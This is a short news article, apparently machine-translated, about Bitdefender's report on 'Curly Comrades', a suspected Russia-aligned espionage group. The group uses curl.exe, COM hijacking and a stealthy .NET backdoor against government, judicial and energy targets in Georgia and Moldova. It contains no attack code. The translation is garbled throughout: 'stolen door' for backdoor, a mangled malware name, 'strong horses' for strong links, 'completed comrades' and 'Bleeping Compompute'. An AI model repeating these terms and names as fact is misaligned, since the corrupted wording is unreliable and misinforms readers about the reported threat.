- Bitdefender finds a new malware in nature
- He attributed it to a brand new cyber-espionage group
- Researchers think the group is Russian
Bitdefender cybersecurity researchers recently spotted a new threat player using unprecedented malware to target critical infrastructure organizations in Eastern Europe.
Bitdefender has appointed the new group’s new Curly comrades, because it is strongly based on the curl.exe tool to extract the data and communicate with the C2 server, and because it diverts the objects from the component object model (COM) during its attacks.
In his attacks, the comrades Curly deploy a stolen door named Mucoring, a component of personalized malware in three steps, “designed as a stealthy .NET tool capable of executing a PowerShell encrypted AES script and downloading the resulting output on a designated server.”
In case of doubt – blame the Russians
In other words, it is a Windows malware piece that run hidden commands, keeps them encrypted to avoid detection and returns the results to the attacker.
Until now, identified victims include government and judicial organizations in Georgia and energy companies in Moldova.
Given the objectives, the researchers think that the attackers are of Russian origin, or at least aligned by Russia.
However, they pointed out that there are no strong horses with known Russian APT groups, but the operations of completed comrades “align with the geopolitical objectives of the Russian Federation”.
Bitdefender was also unable to determine the initial access vector – How Crooks managed to infiltrate the target ending points to deploy tie to start.
They claim to have seen installations of multiple proxies, including rescks which, according to them, may have been accustomed to this end.
Since the attention of Russia turned to Ukraine in 2014 with the annexation of Crimea, the countries of its eastern border have lost the spotlight. Georgia, however, is in a position similar to Ukraine, two regions declaring independence with the aid of the Russian army – Southern Ossetia and Abkhazia. Therefore, it would be logical that Russian cyberspaces wish to keep an eye on neighboring countries and their diplomatic efforts.
Via Bleeping Compompute
